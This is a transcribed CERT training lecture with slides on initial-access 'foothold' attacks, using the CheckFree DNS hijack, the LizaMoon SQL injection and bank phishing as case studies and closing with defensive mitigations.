Embed Size (px)
Citation preview
Foothold Attacks
Table of Contents
Threat Primer .................................................................................................................................. 2
Cyber Threats .................................................................................................................................. 3
Cyber Threat Categorization ........................................................................................................... 6
Foothold .......................................................................................................................................... 7
Foothold Attacks ............................................................................................................................. 9
Foothold Attacks – Example ......................................................................................................... 11
Foothold Attacks – SQL Injection .................................................................................................. 13
Foothold Attacks – Phishing.......................................................................................................... 16
Foothold Attacks – Mitigating Strategies ..................................................................................... 17
Notices .......................................................................................................................................... 19
Page 1 of 19
Threat Primer
© 2012 Carnegie Mellon University
Threat Primer
**001 So, the first thing that we're going to talk about is the various threats, the cyber threats that are out there.
Page 2 of 19
Cyber Threats
2
Cyber Threats
Open question – What cyber threats concern you?• Disruption of critical web services• Web site defacement and resultant reputation hit• Loss of customers’ private information• Nation-state espionage• Hackers using your services to attack others• Spear-phishing against employees• Attacker mapping your internal network• Rootkits and other persistent malware
2
**002 An open question to you-- and again, this is the interactive portion of the class. What keeps you up at night? What type of cyber concerns do you have? What worries you, either from a personal perspective, organizational perspective, or state of the cyber world in general? What concerns you? There's some suggestions up on the screen that you're more than welcome to tell me are your concerns, or you can come up with some others. Yes ma'am? Student: Personally, just in daily use, that somebody doesn't get you by you clicking on something, or-- I'm always sort of aware of where I'm going and what I'm
Page 3 of 19
clicking on. Chris Evans: Okay, safe computer habits. Student: Right. Chris Evans: All right. Sir? Student: What concerns me is more if my network is down for this amount of time we lose this amount of profit. So, it's more of a-- everything's about-- well, for the most part, about money. And that's why people are in business. And if people are down, then also the productivity of my employees will also not be able to-- productivity will go down. So, I'm mainly concerned about the down time because we're protecting our data. Our data is safe. It's offline. However, so someone can steal the information does worry me a little bit, but the most thing that worries me is productivity going down and loss of money. Chris Evans: Yep. Okay. So, denial of service or maybe how your organization reacts to a cyber attack that has larger reaching effects. Okay. Student: Users. Chris Evans: Users? What concerns you about users? Student: They're the biggest weakness in the system administration jobs. And all of that stuff can happen, but to me the biggest concern that I have, from my perspective, is making sure that the users aren't enabling the bad guy to get in. Chris Evans: That's an excellent point. The users are the weakest link in just
Page 4 of 19
about any network infrastructure, not the firewall, not the IDS, not the fact that they're missing patches, the person sitting behind the keyboard. What else? Anything? Nobody mentioned data loss. What about corporate espionage, somebody stealing your intellectual property? That might be a concern to you. Just understand that there's a huge cyber threat realm out there. There's a lot of bad stuff that can go on. And how you react to that should be based on really, what concerns you the most. Understand that this amount of stuff can go wrong. Do you need to be able to detect, monitor, respond to all of this stuff? No, what you need to be able to respond to, and detect, and analyze, and that sort of thing are the things that really concern you. So, on this list, you might find that two out of the three things you're really concerned about. And the other things you're like I'm concerned about that but not as concerned about it. So, what we actually advocate through this class is that you take a risk-based approach to detection, analysis, and response. Understand that you can't solve all the world's cyber problems. Pick the ones that are most relevant to you, that have the most impact to you, and concentrate on those. And the rest of it, given limited resources, you may not be able to do anything else about it.
Page 5 of 19
Cyber Threat Categorization
3
Cyber Threat Categorization
Foothold
Reconnaissance and Enumeration
Privilege Escalation
Corruption
Disruption
Data Exfiltration
Persistence
Malicious Use
Foothold Recon & Enum Priv Esc.
Corruption
Persistence
Data Exfiltration
Disruption
Time and Effort
Conc
urre
ncy
Malicious Use
Some Attacks May Involve Multiple Categories
**003 We've kind of gone through and made a notional categorization of the various cyber threats that are out there. This is kind of what we see is the various categories, so from foothold all the way down to malicious use. You might find that some attacks pull from multiple categories here. So, it's not just an initial access attack or a foothold attack. Maybe it's a combination of foothold and privilege escalation, or foothold, privilege escalation, and denial of service. So, don't look at this and go each cyber attack or cyber threat has to fit in one of these buckets. It may fit in multiple buckets. What I will tell you here, if you look at time and effort and concurrency, meaning
Page 6 of 19
what attacks could go on at the same time, you usually see some type of path evolve here. So, attackers will start with a foothold attack. Then they'll do some type of reconnaissance enumeration. Then they might do privilege escalation. They might finish with a persistence attack. Or, they might just do a denial of service, a disruption attack. Or, they might just come in and do data exfiltration. Understand that any of these attacks could go on at any time and they might be going on in parallel with each other, too.
Foothold
4
Foothold
Initial attempts to access and establish a remote connection into the network
• Direct— SQL Injection, Operating System exploits
• Indirect— Phishing email with malware attachments— Website hosted malware installations
Motivations• Gain access for future attacks
This is usually an “enabling” attack.
**004 So, let's start with a foothold attack. If I said, what is a foothold attack? Well, it's an initial attempt to gain access to the network. What do you think are some
Page 7 of 19
initial access attacks? What are some foothold attacks? Student: Spear phishing. Chris Evans: Spear phishing, that's one. What else would an attacker do to get into a network? Student: Leave a USB drive behind. Chris Evans: Putting malware on a USB stick and hopefully having somebody open it. Student: Man in the middle. Chris Evans: Man in the middle attacks, SQL injection, direct exploits. Basically, the ways that an attacker can get into a system, there are quite a lot of them. So, we looked at this and said there's basically direct attacks where you're actually targeting a system and attacking a system directly. And then there are indirect attacks where you're maybe relying on a user, a social engineering attack, or something like that. So, with a direct attack what we're talking about is SQL injection, direct operating system exploits like exploiting a missing patch on a Windows system or something like that. And indirect, these are ones that require user interaction. So, you're not attacking a system per se as a hacker here. What you're going after is the weakest link in the cyber security chain, the user, as the gentleman in the back mentioned earlier. Why would somebody do an attack like
Page 8 of 19
this? Well, it's an enabling attack. What they're trying to do is gain access to your network to do other things. Why would a hacker just get into the network and say I got into the network, I'm done. Would they ever do that? Student: Yes. Chris Evans: Maybe. They might, if they're doing it just for fame or to put their name in lights. Hey, I hacked into this system. Sure. But usually hackers have other motivations. And they'll use this as enabling attack, the first step.
Foothold Attacks
5
Foothold Attacks
Will target your servers, workstations, and users – anything that is accessible over the network
Checkfree.com
Special thanks to Rod Rasmussen of Internet Identity for contributing source material for this study.
Accessible Email, Web, Remote Administration, etc.
**005 So, here we have an example of a phishing email. It's going to target
Page 9 of 19
anything accessible over the network, your email servers, your web servers, your users if they check email or something like that. There was a case a while ago, I think this was from 2008. There was a company called CheckFree.com and they do a lot of automated clearinghouse, ACH, payment processing. So, if you had a bill payer service, chances are the payments were cleared through this company. And if you had a, let's say, online bill pay service, chances were good that it went through this service as well. Well, somebody at this company received a phishing email. It looked like this. And it was asking them to go and update their name server registrations. The email ostensibly came from Network Solutions, which is a DNS name registration service. And it said we need you to update your customer information. Please come to networksolutions.com. I know that's a little blurry. You've got to squint to see it. But please come to networksolutions.com. Log in to your control panel and update your name server registrations. Well, where this link actually went was networksolutions.com.com42.asia. How many of you want to be that network solutions actually controlled that server? I wouldn't take that bet if I were you. Network Solutions is a very big company, and they're not going to register something with a name this obscure, four domain names down, three levels down. Probably not.
Page 10 of 19
Foothold Attacks – Example
6
Foothold Attacks – Example
December 2, 2008, at about 0030 EST, an attacker modified the authoritative nameserver registration for CheckFree.com.
• Used an on-line control panel belonging to Network Solutions(CheckFree.com’s registrar)
• Pointed the registration to Network Solutions’ free nameserver at nsXX.worldnic.com
The attacker updated all the address records for CheckFree.com hosts to a server physically located in the Ukraine.
It is believed that CheckFree.com’s Network Solutions control panel credentials were compromised by a phishing attack and used to change the nameserver registrations.
**006 So, what actually happened? The attackers sent this phishing email in. They were able to compromise somebody's credentials for the actual network solutions page. And what they did was they went in and they took over the DNS name servers for the company. And instead of going to the company's name servers, they went to a server in the Ukraine. What happens when you change DNS servers? First of all, do you understand what DNS servers do? They direct www.google.com to some IP address. What would you be able to do if you could change what that server said?
Page 11 of 19
Student: Redirect them all to your machines. Chris Evans: Yep, you'd be able to redirect people, and it would be seamless. So, people would put in checkfree.com, and it would go to the DNS server. And the DNS server would say I have a server in the Ukraine for you to talk to. That process is completely transparent to all the users that are out there. When you put in checkfree.com or any URL into your web browser, do you see the domain name process going on? Do you see the IP address that comes back? Unless you're really looking at it, no you don't. So, this was a great attack because it's completely transparent to the end user. So, what happened? They changed the name servers and started redirecting everybody. Instead of going to checkfree.com servers in the U.S., they went to checkfree.com server in the Ukraine. Kind of the end result of this was the attackers here were not really sophisticated. Or they didn't really follow through on the attack because what the analysis of this seemed to indicate was they were only pushing malware, or adware when people visited their site. So, people coming into billpay.checkfree.com ended up on this server in the Ukraine, and they got adware. Well, if you were a cyber crime entity you might also do something like put a copy of the billpay site up there. I'll ask you for your username and password. I'll ask you for your bank account details, and I'll start stealing money from you. The guys behind this attack didn't do any of that. And I think Check Free as a company got off easy because of that.
Page 12 of 19
Foothold Attacks – SQL Injection
7
Foothold Attacks – SQL Injection
http://ddanchev.blogspot.com/2011/03/dissecting-massive-sql-injection-attack.htmlhttp://www.ibtimes.com/articles/129843/20110402/lizamoon-websense-apple-itunes-security-trojan-malware-scareware-script-sql-injection-four-million-w.htm
April, 2011 – LizaMoon – SQL injected sites push “scareware” on visitors
• ~ 1100 sites, 30,000 – 1.5 million hosts infected
Takes advantage of “trust” between a site and its visitors.
**007 Yes sir? Student: I was going to say I know some people that do what they call domain kiting or floating. Because when you buy a domain you have five days or something. There's a grace period where you can decide whether you want the domain name. And in that period they'll try to put up a fake banking site and put the Verisign down to make it look real secure, just almost identical. And then after they get your information, then that domain name will say I don't want it. So, that also covers up their tracks. Chris Evans: Yep, that's a huge attack surface. So, the attackers have realized
Page 13 of 19
that the end user has kind of gotten a little bit smarter than we were ten years ago. So, ten years ago you could send in an obfuscated URL as part of the phishing email. and everybody would go okay. Fall for it. But today people will look at the URL and go this .com.com42.asia.whatever, that looks a little suspicious. So now what the attackers are doing is they are using more legitimate looking domain names, as you suggested, like copies of Verisign with a one in it or something like that, instead of the URL obfuscation attacks. SQL injection, this is probably one of the biggest attack vectors that are out there right now. There is a recent data breach report that says roughly eighty-five percent of the data breaches in the world are caused by SQL injection. So, these are people hacking into web servers that have a database back end to it. There was a case about a year ago. LizaMoon. This is where the hackers came in and hacked up a site such that when people visited it, they had malware installed on their systems. Actually, it was scareware. So, if you visited a certain site, and it was a legitimate site. This is not a hacker site or some bogus site. This was a legitimate site that the hackers modified with SQL injection. So, that when you came to the site, you actually downloaded a piece of scareware that looked like this. And would pop up a little box up on your screen. And it would say your computer is infected. You've got twenty-six Trojans, thirty-nine worms, seventeen viruses. You've got every virus known to man on this computer. You are very insecure. But we can help you with
Page 14 of 19
that for the low cost of $29.95. Pay us with your credit card. We'll take care of all this big problems for you. We'll take all the malware off your system, and you'll be happy. And we will be happy. Do you think this works? Student: Yes. Chris Evans: It works to the tune of about a billion dollars. The crew behind this was arrested in an Eastern European country maybe a year ago. One billion dollars out of this one scam. Wow. So, how many people did they get to go-- to the pay me $29.95, and I'll clean up your system? Quite a few. It was quite a cyber crime ring they had going. The guys behind us were actually caught because they were driving Mercedes S class sedans around this really tiny Eastern European city where the average income is significantly lower than what could afford a Mercedes S class. So, they were living a little bit beyond what the local economy would support, and that raised some flags. But after clearing a billion dollars, they were doing pretty good for themselves.
Page 15 of 19
Foothold Attacks – Phishing
8
Foothold Attacks – Phishing
!!!
fraudwatchinternational.com
http://news.softpedia.com/news/PDF-Based-Targeted-Attack-Against-Military-Contractors-Spotted-212139.shtml
July 2011
**008 Another type of foothold attack, phishing attacks, these are very prevalent. They're getting very, very good. Here you can see this email that ostensibly came from Bank of America. It has the Bank of America logo on it. It has the little copyright statement on it. It has the same fonts and style sheets that Bank of America uses. It looks pretty legitimate. When you click on the link, you pull up this website here. And this website, again it's got the Bank of America logo. It looks just like the Bank of America site, but it's asking you a lot of really detailed questions about can I have your bank account number? Can I have your mother's maiden name? Can I have your
Page 16 of 19
address? But it looks very, very realistic. There's a site out there called Fraud Watch International, fraudwatchinternational.com. They track all this sort of monkey business that's going on with phishing. And so, you can see, look at how many phishing attacks that they're actually monitoring. They've got thousands in there. They probably have between twenty and thirty that get added every day of people trying phishing attacks that look like this.
Foothold Attacks – Mitigating Strategies
9
Foothold Attacks – Mitigating Strategies
Awareness and Education• Phishing Exercises
Intrusion Detection Systems
Critical Application Code Reviews
Externally Visible System and Application Patching
Access Control • White listing
Conduct Regular Vulnerability Scans• Finds common holes which an attacker can exploit
**009 Mitigating strategies, if you are trying to get around foothold attacks, what would you actually do? Well, user education is key, so making sure that users don't fall victim to this sort of stuff.
Page 17 of 19
Intrusion detection systems will pick up the stuff that there's a signature for at least. You might try to do some application code reviews to get around or find the SQL injection points before the attackers can get it. Any external system needs to be patched, and it's got to be kept up to date. I know that's kind of-- patching is almost a losing game because all you're doing is reacting to the potential attacks that could be there. Somebody can always come along with a zero day or something like that and catch you. But you have to do it. Application white listing or access control will make sure that users can't download and run junk.exe or something like that. And regular vulnerability scans. This will tell you where the holes are in your network. Theory is that you can go and fix those before the bad guys come along and do it.
Page 18 of 19
Notices
NoticesCopyright 2013 Carnegie Mellon University
This material has been approved for public release and unlimited distribution except as restricted below. This material is distributed by the Software Engineering Institute (SEI) only to course attendees for their own individual study. Except for the U.S. government purposes described below, this material SHALL NOT be reproduced or used in any other manner without requesting formal permission from the Software Engineering Institute at [email protected].
This material is based upon work funded and supported by the Department of Defense under Contract No. FA8721-05-C-0003 with Carnegie Mellon University for the operation of the Software Engineering Institute, a federally funded research and development center.
The U.S. Government's rights to use, modify, reproduce, release, perform, display, or disclose this material are restricted by the Rights in Technical Data-Noncommercial Items clauses (DFAR 252-227.7013 and DFAR 252-227.7013 Alternate I) contained in the above identified contract. Any reproduction of this material or portions thereof marked with this legend must also reproduce the disclaimers contained on this slide.
Although the rights granted by contract do not require course attendance to use this material for U.S. Government purposes, the SEI recommends attendance to ensure proper understanding.
NO WARRANTY. THE MATERIAL IS PROVIDED ON AN “AS IS” BASIS, AND CARNEGIE MELLON DISCLAIMS ANY AND ALL WARRANTIES, IMPLIED OR OTHERWISE (INCLUDING, BUT NOT LIMITED TO, WARRANTY OF FITNESS FOR A PARTICULAR PURPOSE, RESULTS OBTAINED FROM USE OF THE MATERIAL, MERCHANTABILITY, AND/OR NON-INFRINGEMENT).
CERT® is a registered mark of Carnegie Mellon University..
Page 19 of 19
